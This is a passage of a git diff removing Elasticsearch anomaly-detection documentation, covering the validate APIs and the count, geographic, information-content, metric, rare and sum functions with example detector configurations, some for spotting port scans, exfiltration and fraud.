{ml-docs-setup-privileges}. - -[[ml-valid-detector-desc]] -== {api-description-title} - -This API enables you to validate the detector configuration -before you create an {anomaly-job}. - -[[ml-valid-detector-request-body]] -== {api-request-body-title} - -For a list of the properties that you can specify in the body of this API, -see detector configuration objects. - -[[ml-valid-detector-example]] -== {api-examples-title} - -The following example validates detector configuration information: - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/_validate/detector -{ - "function": "metric", - "field_name": "responsetime", - "by_field_name": "airline" -} --------------------------------------------------- -// TEST[skip:needs-licence] - -When the validation completes, you receive the following results: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/validate-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/validate-job.asciidoc deleted file mode 100644 index c522c76b3f5..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/validate-job.asciidoc +++ /dev/null @@ -1,69 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-valid-job]] -= Validate {anomaly-jobs} API -++++ -Validate jobs -++++ - -Validates {anomaly-job} configuration information. - -[[ml-valid-job-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors/_validate` - -[[ml-valid-job-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-valid-job-desc]] -== {api-description-title} - -This API enables you to validate the {anomaly-job} configuration before you -create the job. - -[[ml-valid-job-request-body]] -== {api-request-body-title} - -For a list of the properties that you can specify in the body of this API, -see <>. - -[[ml-valid-job-example]] -== {api-examples-title} - -The following example validates job configuration information: - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/_validate -{ - "description": "Unusual response times by airlines", - "analysis_config": { - "bucket_span": "300S", - "detectors": [ - { - "function": "metric", - "field_name": "responsetime", - "by_field_name": "airline" } ], - "influencers": [ "airline" ] - }, - "data_description": { - "time_field": "time", - "time_format": "yyyy-MM-dd'T'HH:mm:ssX" - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -When the validation is complete, you receive the following results: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/functions/ml-count-functions.asciidoc b/docs/reference/ml/anomaly-detection/functions/ml-count-functions.asciidoc deleted file mode 100644 index 277de36aa4b..00000000000 --- a/docs/reference/ml/anomaly-detection/functions/ml-count-functions.asciidoc +++ /dev/null @@ -1,286 +0,0 @@ -[role="xpack"] -[[ml-count-functions]] -= Count functions - -Count functions detect anomalies when the number of events in a bucket is -anomalous. - -Use `non_zero_count` functions if your data is sparse and you want to ignore -cases where the bucket count is zero. - -Use `distinct_count` functions to determine when the number of distinct values -in one field is unusual, as opposed to the total count. - -Use high-sided functions if you want to monitor unusually high event rates. -Use low-sided functions if you want to look at drops in event rate. - -The {ml-features} include the following count functions: - -* xref:ml-count[`count`, `high_count`, `low_count`] -* xref:ml-nonzero-count[`non_zero_count`, `high_non_zero_count`, `low_non_zero_count`] -* xref:ml-distinct-count[`distinct_count`, `high_distinct_count`, `low_distinct_count`] - -[discrete] -[[ml-count]] -== Count, high_count, low_count - -The `count` function detects anomalies when the number of events in a bucket is -anomalous. - -The `high_count` function detects anomalies when the count of events in a -bucket are unusually high. - -The `low_count` function detects anomalies when the count of events in a -bucket are unusually low. - -These functions support the following properties: - -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 1: Analyzing events with the count function -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/example1 -{ - "analysis_config": { - "detectors": [{ - "function" : "count" - }] - }, - "data_description": { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -This example is probably the simplest possible analysis. It identifies -time buckets during which the overall count of events is higher or lower than -usual. - -When you use this function in a detector in your {anomaly-job}, it models the -event rate and detects when the event rate is unusual compared to its past -behavior. - -.Example 2: Analyzing errors with the high_count function -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/example2 -{ - "analysis_config": { - "detectors": [{ - "function" : "high_count", - "by_field_name" : "error_code", - "over_field_name": "user" - }] - }, - "data_description": { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -If you use this `high_count` function in a detector in your {anomaly-job}, it -models the event rate for each error code. It detects users that generate an -unusually high count of error codes compared to other users. - - -.Example 3: Analyzing status codes with the low_count function -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/example3 -{ - "analysis_config": { - "detectors": [{ - "function" : "low_count", - "by_field_name" : "status_code" - }] - }, - "data_description": { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -In this example, the function detects when the count of events for a -status code is lower than usual. - -When you use this function in a detector in your {anomaly-job}, it models the -event rate for each status code and detects when a status code has an unusually -low count compared to its past behavior. - -.Example 4: Analyzing aggregated data with the count function -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/example4 -{ - "analysis_config": { - "summary_count_field_name" : "events_per_min", - "detectors": [{ - "function" : "count" - }] - }, - "data_description": { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -If you are analyzing an aggregated `events_per_min` field, do not use a sum -function (for example, `sum(events_per_min)`). Instead, use the count function -and the `summary_count_field_name` property. For more information, see -<>. - -[discrete] -[[ml-nonzero-count]] -== Non_zero_count, high_non_zero_count, low_non_zero_count - -The `non_zero_count` function detects anomalies when the number of events in a -bucket is anomalous, but it ignores cases where the bucket count is zero. Use -this function if you know your data is sparse or has gaps and the gaps are not -important. - -The `high_non_zero_count` function detects anomalies when the number of events -in a bucket is unusually high and it ignores cases where the bucket count is -zero. - -The `low_non_zero_count` function detects anomalies when the number of events in -a bucket is unusually low and it ignores cases where the bucket count is zero. - -These functions support the following properties: - -* `by_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -For example, if you have the following number of events per bucket: - -======================================== - -1,22,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,43,31,0,0,0,0,0,0,0,0,0,0,0,0,2,1 - -======================================== - -The `non_zero_count` function models only the following data: - -======================================== - -1,22,2,43,31,2,1 - -======================================== - -.Example 5: Analyzing signatures with the high_non_zero_count function -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/example5 -{ - "analysis_config": { - "detectors": [{ - "function" : "high_non_zero_count", - "by_field_name" : "signaturename" - }] - }, - "data_description": { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -If you use this `high_non_zero_count` function in a detector in your -{anomaly-job}, it models the count of events for the `signaturename` field. It -ignores any buckets where the count is zero and detects when a `signaturename` -value has an unusually high count of events compared to its past behavior. - -NOTE: Population analysis (using an `over_field_name` property value) is not -supported for the `non_zero_count`, `high_non_zero_count`, and -`low_non_zero_count` functions. If you want to do population analysis and your -data is sparse, use the `count` functions, which are optimized for that scenario. - - -[discrete] -[[ml-distinct-count]] -== Distinct_count, high_distinct_count, low_distinct_count - -The `distinct_count` function detects anomalies where the number of distinct -values in one field is unusual. - -The `high_distinct_count` function detects unusually high numbers of distinct -values in one field. - -The `low_distinct_count` function detects unusually low numbers of distinct -values in one field. - -These functions support the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 6: Analyzing users with the distinct_count function -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/example6 -{ - "analysis_config": { - "detectors": [{ - "function" : "distinct_count", - "field_name" : "user" - }] - }, - "data_description": { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -This `distinct_count` function detects when a system has an unusual number -of logged in users. When you use this function in a detector in your -{anomaly-job}, it models the distinct count of users. It also detects when the -distinct number of users is unusual compared to the past. - -.Example 7: Analyzing ports with the high_distinct_count function -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/example7 -{ - "analysis_config": { - "detectors": [{ - "function" : "high_distinct_count", - "field_name" : "dst_port", - "over_field_name": "src_ip" - }] - }, - "data_description": { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -This example detects instances of port scanning. When you use this function in a -detector in your {anomaly-job}, it models the distinct count of ports. It also -detects the `src_ip` values that connect to an unusually high number of different -`dst_ports` values compared to other `src_ip` values. diff --git a/docs/reference/ml/anomaly-detection/functions/ml-functions.asciidoc b/docs/reference/ml/anomaly-detection/functions/ml-functions.asciidoc deleted file mode 100644 index b0481001dd5..00000000000 --- a/docs/reference/ml/anomaly-detection/functions/ml-functions.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ -[role="xpack"] -[[ml-functions]] -= Function reference - -The {ml-features} include analysis functions that provide a wide variety of -flexible ways to analyze data for anomalies. - -When you create {anomaly-jobs}, you specify one or more detectors, which define -the type of analysis that needs to be done. If you are creating your job by -using {ml} APIs, you specify the functions in detector configuration objects. -If you are creating your job in {kib}, you specify the functions differently -depending on whether you are creating single metric, multi-metric, or advanced -jobs. - -Most functions detect anomalies in both low and high values. In statistical -terminology, they apply a two-sided test. Some functions offer low and high -variations (for example, `count`, `low_count`, and `high_count`). These variations -apply one-sided tests, detecting anomalies only when the values are low or -high, depending one which alternative is used. - -You can specify a `summary_count_field_name` with any function except `metric`. -When you use `summary_count_field_name`, the {ml} features expect the input -data to be pre-aggregated. The value of the `summary_count_field_name` field -must contain the count of raw events that were summarized. In {kib}, use the -**summary_count_field_name** in advanced {anomaly-jobs}. Analyzing aggregated -input data provides a significant boost in performance. For more information, see -<>. - -If your data is sparse, there may be gaps in the data which means you might have -empty buckets. You might want to treat these as anomalies or you might want these -gaps to be ignored. Your decision depends on your use case and what is important -to you. It also depends on which functions you use. The `sum` and `count` -functions are strongly affected by empty buckets. For this reason, there are -`non_null_sum` and `non_zero_count` functions, which are tolerant to sparse data. -These functions effectively ignore empty buckets. - -* <> -* <> -* <> -* <> -* <> -* <> -* <> diff --git a/docs/reference/ml/anomaly-detection/functions/ml-geo-functions.asciidoc b/docs/reference/ml/anomaly-detection/functions/ml-geo-functions.asciidoc deleted file mode 100644 index 68ab3261fc9..00000000000 --- a/docs/reference/ml/anomaly-detection/functions/ml-geo-functions.asciidoc +++ /dev/null @@ -1,79 +0,0 @@ -[role="xpack"] -[[ml-geo-functions]] -= Geographic functions - -The geographic functions detect anomalies in the geographic location of the -input data. - -The {ml-features} include the following geographic function: `lat_long`. - -NOTE: You cannot create forecasts for {anomaly-jobs} that contain geographic -functions. You also cannot add rules with conditions to detectors that use -geographic functions. - -[discrete] -[[ml-lat-long]] -== Lat_long - -The `lat_long` function detects anomalies in the geographic location of the -input data. - -This function supports the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 1: Analyzing transactions with the lat_long function -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/example1 -{ - "analysis_config": { - "detectors": [{ - "function" : "lat_long", - "field_name" : "transactionCoordinates", - "by_field_name" : "creditCardNumber" - }] - }, - "data_description": { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -If you use this `lat_long` function in a detector in your {anomaly-job}, it -detects anomalies where the geographic location of a credit card transaction is -unusual for a particular customer’s credit card. An anomaly might indicate fraud. - -IMPORTANT: The `field_name` that you supply must be a single string that contains -two comma-separated numbers of the form `latitude,longitude`, a `geo_point` field, -a `geo_shape` field that contains point values, or a `geo_centroid` aggregation. -The `latitude` and `longitude` must be in the range -180 to 180 and represent a -point on the surface of the Earth. - -For example, JSON data might contain the following transaction coordinates: - -[source,js] --------------------------------------------------- -{ - "time": 1460464275, - "transactionCoordinates": "40.7,-74.0", - "creditCardNumber": "1234123412341234" -} --------------------------------------------------- -// NOTCONSOLE - -In {es}, location data is likely to be stored in `geo_point` fields. For more -information, see {ref}/geo-point.html[Geo-point data type]. This data type is -supported natively in {ml-features}. Specifically, {dfeed} when pulling data from -a `geo_point` field, will transform the data into the appropriate `lat,lon` string -format before sending to the {anomaly-job}. - -For more information, see <>. diff --git a/docs/reference/ml/anomaly-detection/functions/ml-info-functions.asciidoc b/docs/reference/ml/anomaly-detection/functions/ml-info-functions.asciidoc deleted file mode 100644 index 81d8c740044..00000000000 --- a/docs/reference/ml/anomaly-detection/functions/ml-info-functions.asciidoc +++ /dev/null @@ -1,90 +0,0 @@ -[[ml-info-functions]] -= Information Content Functions - -The information content functions detect anomalies in the amount of information -that is contained in strings within a bucket. These functions can be used as -a more sophisticated method to identify incidences of data exfiltration or -C2 (Command and Control) activity, when analyzing the size in bytes of the data might not be sufficient. - -The {ml-features} include the following information content functions: - -* `info_content`, `high_info_content`, `low_info_content` - -[discrete] -[[ml-info-content]] -== Info_content, High_info_content, Low_info_content - -The `info_content` function detects anomalies in the amount of information that -is contained in strings in a bucket. - -If you want to monitor for unusually high amounts of information, -use `high_info_content`. -If want to look at drops in information content, use `low_info_content`. - -These functions support the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 1: Analyzing subdomain strings with the info_content function -[source,js] --------------------------------------------------- -{ - "function" : "info_content", - "field_name" : "subdomain", - "over_field_name" : "highest_registered_domain" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `info_content` function in a detector in your {anomaly-job}, it -models information that is present in the `subdomain` string. It detects -anomalies where the information content is unusual compared to the other -`highest_registered_domain` values. An anomaly could indicate an abuse of the -DNS protocol, such as malicious command and control activity. - -NOTE: In this example, both high and low values are considered anomalous. -In many use cases, the `high_info_content` function is often a more appropriate -choice. - -.Example 2: Analyzing query strings with the high_info_content function -[source,js] --------------------------------------------------- -{ - "function" : "high_info_content", - "field_name" : "query", - "over_field_name" : "src_ip" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `high_info_content` function in a detector in your {anomaly-job}, -it models information content that is held in the DNS query string. It detects -`src_ip` values where the information content is unusually high compared to -other `src_ip` values. This example is similar to the example for the -`info_content` function, but it reports anomalies only where the amount of -information content is higher than expected. - -.Example 3: Analyzing message strings with the low_info_content function -[source,js] --------------------------------------------------- -{ - "function" : "low_info_content", - "field_name" : "message", - "by_field_name" : "logfilename" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `low_info_content` function in a detector in your {anomaly-job}, -it models information content that is present in the message string for each -`logfilename`. It detects anomalies where the information content is low -compared to its past behavior. For example, this function detects unusually low -amounts of information in a collection of rolling log files. Low information -might indicate that a process has entered an infinite loop or that logging -features have been disabled. diff --git a/docs/reference/ml/anomaly-detection/functions/ml-metric-functions.asciidoc b/docs/reference/ml/anomaly-detection/functions/ml-metric-functions.asciidoc deleted file mode 100644 index e009da0050e..00000000000 --- a/docs/reference/ml/anomaly-detection/functions/ml-metric-functions.asciidoc +++ /dev/null @@ -1,326 +0,0 @@ -[role="xpack"] -[[ml-metric-functions]] -= Metric functions - -The metric functions include functions such as mean, min and max. These values -are calculated for each bucket. Field values that cannot be converted to -double precision floating point numbers are ignored. - -The {ml-features} include the following metric functions: - -* <> -* <> -* xref:ml-metric-median[`median`, `high_median`, `low_median`] -* xref:ml-metric-mean[`mean`, `high_mean`, `low_mean`] -* <> -* xref:ml-metric-varp[`varp`, `high_varp`, `low_varp`] - -NOTE: You cannot add rules with conditions to detectors that use the `metric` -function. - -[discrete] -[[ml-metric-min]] -== Min - -The `min` function detects anomalies in the arithmetic minimum of a value. -The minimum value is calculated for each bucket. - -High- and low-sided functions are not applicable. - -This function supports the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 1: Analyzing minimum transactions with the min function -[source,js] --------------------------------------------------- -{ - "function" : "min", - "field_name" : "amt", - "by_field_name" : "product" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `min` function in a detector in your {anomaly-job}, it detects -where the smallest transaction is lower than previously observed. You can use -this function to detect items for sale at unintentionally low prices due to data -entry mistakes. It models the minimum amount for each product over time. - -[discrete] -[[ml-metric-max]] -== Max - -The `max` function detects anomalies in the arithmetic maximum of a value. -The maximum value is calculated for each bucket. - -High- and low-sided functions are not applicable. - -This function supports the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 2: Analyzing maximum response times with the max function -[source,js] --------------------------------------------------- -{ - "function" : "max", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `max` function in a detector in your {anomaly-job}, it detects -where the longest `responsetime` is longer than previously observed. You can use -this function to detect applications that have `responsetime` values that are -unusually lengthy. It models the maximum `responsetime` for each application -over time and detects when the longest `responsetime` is unusually long compared -to previous applications. - -.Example 3: Two detectors with max and high_mean functions -[source,js] --------------------------------------------------- -{ - "function" : "max", - "field_name" : "responsetime", - "by_field_name" : "application" -}, -{ - "function" : "high_mean", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -The analysis in the previous example can be performed alongside `high_mean` -functions by application. By combining detectors and using the same influencer -this job can detect both unusually long individual response times and average -response times for each bucket. - -[discrete] -[[ml-metric-median]] -== Median, high_median, low_median - -The `median` function detects anomalies in the statistical median of a value. -The median value is calculated for each bucket. - -If you want to monitor unusually high median values, use the `high_median` -function. - -If you are just interested in unusually low median values, use the `low_median` -function. - -These functions support the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 4: Analyzing response times with the median function -[source,js] --------------------------------------------------- -{ - "function" : "median", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `median` function in a detector in your {anomaly-job}, it models -the median `responsetime` for each application over time. It detects when the -median `responsetime` is unusual compared to previous `responsetime` values. - -[discrete] -[[ml-metric-mean]] -== Mean, high_mean, low_mean - -The `mean` function detects anomalies in the arithmetic mean of a value. -The mean value is calculated for each bucket. - -If you want to monitor unusually high average values, use the `high_mean` -function. - -If you are just interested in unusually low average values, use the `low_mean` -function. - -These functions support the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 5: Analyzing response times with the mean function -[source,js] --------------------------------------------------- -{ - "function" : "mean", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `mean` function in a detector in your {anomaly-job}, it models -the mean `responsetime` for each application over time. It detects when the mean -`responsetime` is unusual compared to previous `responsetime` values. - -.Example 6: Analyzing response times with the high_mean function -[source,js] --------------------------------------------------- -{ - "function" : "high_mean", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `high_mean` function in a detector in your {anomaly-job}, it -models the mean `responsetime` for each application over time. It detects when -the mean `responsetime` is unusually high compared to previous `responsetime` -values. - -.Example 7: Analyzing response times with the low_mean function -[source,js] --------------------------------------------------- -{ - "function" : "low_mean", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `low_mean` function in a detector in your {anomaly-job}, it -models the mean `responsetime` for each application over time. It detects when -the mean `responsetime` is unusually low compared to previous `responsetime` -values. - -[discrete] -[[ml-metric-metric]] -== Metric - -The `metric` function combines `min`, `max`, and `mean` functions. You can use -it as a shorthand for a combined analysis. If you do not specify a function in -a detector, this is the default function. - -High- and low-sided functions are not applicable. You cannot use this function -when a `summary_count_field_name` is specified. - -This function supports the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 8: Analyzing response times with the metric function -[source,js] --------------------------------------------------- -{ - "function" : "metric", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `metric` function in a detector in your {anomaly-job}, it models -the mean, min, and max `responsetime` for each application over time. It detects -when the mean, min, or max `responsetime` is unusual compared to previous -`responsetime` values. - -[discrete] -[[ml-metric-varp]] -== Varp, high_varp, low_varp - -The `varp` function detects anomalies in the variance of a value which is a -measure of the variability and spread in the data. - -If you want to monitor unusually high variance, use the `high_varp` function. - -If you are just interested in unusually low variance, use the `low_varp` function. - -These functions support the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 9: Analyzing response times with the varp function -[source,js] --------------------------------------------------- -{ - "function" : "varp", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `varp` function in a detector in your {anomaly-job}, it models -the variance in values of `responsetime` for each application over time. It -detects when the variance in `responsetime` is unusual compared to past -application behavior. - -.Example 10: Analyzing response times with the high_varp function -[source,js] --------------------------------------------------- -{ - "function" : "high_varp", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `high_varp` function in a detector in your {anomaly-job}, it -models the variance in values of `responsetime` for each application over time. -It detects when the variance in `responsetime` is unusual compared to past -application behavior. - -.Example 11: Analyzing response times with the low_varp function -[source,js] --------------------------------------------------- -{ - "function" : "low_varp", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `low_varp` function in a detector in your {anomaly-job}, it -models the variance in values of `responsetime` for each application over time. -It detects when the variance in `responsetime` is unusual compared to past -application behavior. diff --git a/docs/reference/ml/anomaly-detection/functions/ml-rare-functions.asciidoc b/docs/reference/ml/anomaly-detection/functions/ml-rare-functions.asciidoc deleted file mode 100644 index f0a788698a3..00000000000 --- a/docs/reference/ml/anomaly-detection/functions/ml-rare-functions.asciidoc +++ /dev/null @@ -1,137 +0,0 @@ -[role="xpack"] -[[ml-rare-functions]] -= Rare functions - -The rare functions detect values that occur rarely in time or rarely for a -population. - -The `rare` analysis detects anomalies according to the number of distinct rare -values. This differs from `freq_rare`, which detects anomalies according to the -number of times (frequency) rare values occur. - -[NOTE] -==== -* The `rare` and `freq_rare` functions should not be used in conjunction with -`exclude_frequent`. -* You cannot create forecasts for {anomaly-jobs} that contain `rare` or -`freq_rare` functions. -* You cannot add rules with conditions to detectors that use `rare` or -`freq_rare` functions. -* Shorter bucket spans (less than 1 hour, for example) are recommended when -looking for rare events. The functions model whether something happens in a -bucket at least once. With longer bucket spans, it is more likely that -entities will be seen in a bucket and therefore they appear less rare. -Picking the ideal bucket span depends on the characteristics of the data -with shorter bucket spans typically being measured in minutes, not hours. -* To model rare data, a learning period of at least 20 buckets is required -for typical data. -==== - -The {ml-features} include the following rare functions: - -* <> -* <> - - -[discrete] -[[ml-rare]] -== Rare - -The `rare` function detects values that occur rarely in time or rarely for a -population. It detects anomalies according to the number of distinct rare values. - -This function supports the following properties: - -* `by_field_name` (required) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 1: Analyzing status codes with the rare function -[source,js] --------------------------------------------------- -{ - "function" : "rare", - "by_field_name" : "status" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `rare` function in a detector in your {anomaly-job}, it detects -values that are rare in time. It models status codes that occur over time and -detects when rare status codes occur compared to the past. For example, you can -detect status codes in a web access log that have never (or rarely) occurred -before. - -.Example 2: Analyzing status codes in a population with the rare function -[source,js] --------------------------------------------------- -{ - "function" : "rare", - "by_field_name" : "status", - "over_field_name" : "clientip" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `rare` function in a detector in your {anomaly-job}, it detects -values that are rare in a population. It models status code and client IP -interactions that occur. It defines a rare status code as one that occurs for -few client IP values compared to the population. It detects client IP values -that experience one or more distinct rare status codes compared to the -population. For example in a web access log, a `clientip` that experiences the -highest number of different rare status codes compared to the population is -regarded as highly anomalous. This analysis is based on the number of different -status code values, not the count of occurrences. - -NOTE: To define a status code as rare the {ml-features} look at the number -of distinct status codes that occur, not the number of times the status code -occurs. If a single client IP experiences a single unique status code, this -is rare, even if it occurs for that client IP in every bucket. - -[discrete] -[[ml-freq-rare]] -== Freq_rare - -The `freq_rare` function detects values that occur rarely for a population. -It detects anomalies according to the number of times (frequency) that rare -values occur. - -This function supports the following properties: - -* `by_field_name` (required) -* `over_field_name` (required) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 3: Analyzing URI values in a population with the freq_rare function -[source,js] --------------------------------------------------- -{ - "function" : "freq_rare", - "by_field_name" : "uri", - "over_field_name" : "clientip" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `freq_rare` function in a detector in your {anomaly-job}, it -detects values that are frequently rare in a population. It models URI paths and -client IP interactions that occur. It defines a rare URI path as one that is -visited by few client IP values compared to the population. It detects the -client IP values that experience many interactions with rare URI paths compared -to the population. For example in a web access log, a client IP that visits -one or more rare URI paths many times compared to the population is regarded as -highly anomalous. This analysis is based on the count of interactions with rare -URI paths, not the number of different URI path values. - - -NOTE: Defining a URI path as rare happens the same way as you can see in the -case of the status codes above: the analytics consider the number of distinct -values that occur and not the number of times the URI path occurs. If a single -client IP visits a single unique URI path, this is rare, even if it -occurs for that client IP in every bucket. diff --git a/docs/reference/ml/anomaly-detection/functions/ml-sum-functions.asciidoc b/docs/reference/ml/anomaly-detection/functions/ml-sum-functions.asciidoc deleted file mode 100644 index ec0d30365d6..00000000000 --- a/docs/reference/ml/anomaly-detection/functions/ml-sum-functions.asciidoc +++ /dev/null @@ -1,114 +0,0 @@ -[role="xpack"] -[[ml-sum-functions]] -= Sum functions - -The sum functions detect anomalies when the sum of a field in a bucket is -anomalous. - -If you want to monitor unusually high totals, use high-sided functions. - -If want to look at drops in totals, use low-sided functions. - -If your data is sparse, use `non_null_sum` functions. Buckets without values are -ignored; buckets with a zero value are analyzed. - -The {ml-features} include the following sum functions: - -* xref:ml-sum[`sum`, `high_sum`, `low_sum`] -* xref:ml-nonnull-sum[`non_null_sum`, `high_non_null_sum`, `low_non_null_sum`] - -[discrete] -[[ml-sum]] -== Sum, high_sum, low_sum - -The `sum` function detects anomalies where the sum of a field in a bucket is -anomalous. - -If you want to monitor unusually high sum values, use the `high_sum` function. - -If you want to monitor unusually low sum values, use the `low_sum` function. - -These functions support the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 1: Analyzing total expenses with the sum function -[source,js] --------------------------------------------------- -{ - "function" : "sum", - "field_name" : "expenses", - "by_field_name" : "costcenter", - "over_field_name" : "employee" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `sum` function in a detector in your {anomaly-job}, it -models total expenses per employees for each cost center. For each time bucket, -it detects when an employee’s expenses are unusual for a cost center compared -to other employees. - -.Example 2: Analyzing total bytes with the high_sum function -[source,js] --------------------------------------------------- -{ - "function" : "high_sum", - "field_name" : "cs_bytes", - "over_field_name" : "cs_host" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `high_sum` function in a detector in your {anomaly-job}, it -models total `cs_bytes`. It detects `cs_hosts` that transfer unusually high -volumes compared to other `cs_hosts`. This example looks for volumes of data -transferred from a client to a server on the internet that are unusual compared -to other clients. This scenario could be useful to detect data exfiltration or -to find users that are abusing internet privileges. - -[discrete] -[[ml-nonnull-sum]] -== Non_null_sum, high_non_null_sum, low_non_null_sum - -The `non_null_sum` function is useful if your data is sparse. Buckets without -values are ignored and buckets with a zero value are analyzed. - -If you want to monitor unusually high totals, use the `high_non_null_sum` -function. - -If you want to look at drops in totals, use the `low_non_null_sum` function. - -These functions support the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -NOTE: Population analysis (that is to say, use of the `over_field_name` property) -is not applicable for this function. - -.Example 3: Analyzing employee approvals with the high_non_null_sum function -[source,js] --------------------------------------------------- -{ - "function" : "high_non_null_sum", - "fieldName" : "amount_approved", - "byFieldName" : "employee" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `high_non_null_sum` function in a detector in your {anomaly-job}, -it models the total `amount_approved` for each employee. It ignores any buckets -where the amount is null. It detects employees who approve unusually high -amounts compared to their past behavior. diff --git 